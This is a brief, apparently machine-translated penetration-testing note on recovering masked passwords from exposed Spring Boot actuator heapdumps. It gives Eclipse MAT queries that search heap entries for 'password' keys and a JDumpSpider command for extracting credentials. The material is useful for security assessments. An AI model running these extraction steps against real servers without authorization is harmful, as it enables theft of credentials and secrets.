Springboot Basic Test

Apr 14, 2023#渗透 #springboot217

AI Translation

This post is translated from Chinese into English through AI.View Original

AI-generated summary

The text discusses the use of the "/actuator/env" endpoint in SpringBoot websites, which usually masks sensitive information like passwords with asterisks. However, if the website allows downloading and decoding the "/actuator/heapdump" or "/heapdump" files, it is possible to extract the sensitive information. The text also mentions a tool called "SpringBoot-Scan" for scanning SpringBoot nodes. It provides code snippets for searching for passwords in LinkedHashMap and Hashtable entries. Additionally, it mentions another tool called "JDumpSpider" for analyzing heapdump files. The text includes links to the GitHub repositories of both tools and credits the images used.

123

Find * Password#

In the SpringBoot site, there is an endpoint named /actuator/env, which usually shields some sensitive information, such as password, but replaces it with * symbol. If the target site can download the file /actuator/heapdump or /heapdump and decode it, sensitive information contained in it can be extracted.

You can also use this tool to scan SpringBoot nodes.

Github Repo not found

The embedded github repo could not be found…

mat#

select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

JDumpSpider#

Project address: https://github.com/whwlsfb/JDumpSpider

$ java -jar JDumpSpider-1.0-SNAPSHOT-full.jar heapdump

Image source: https://wallhaven.cc/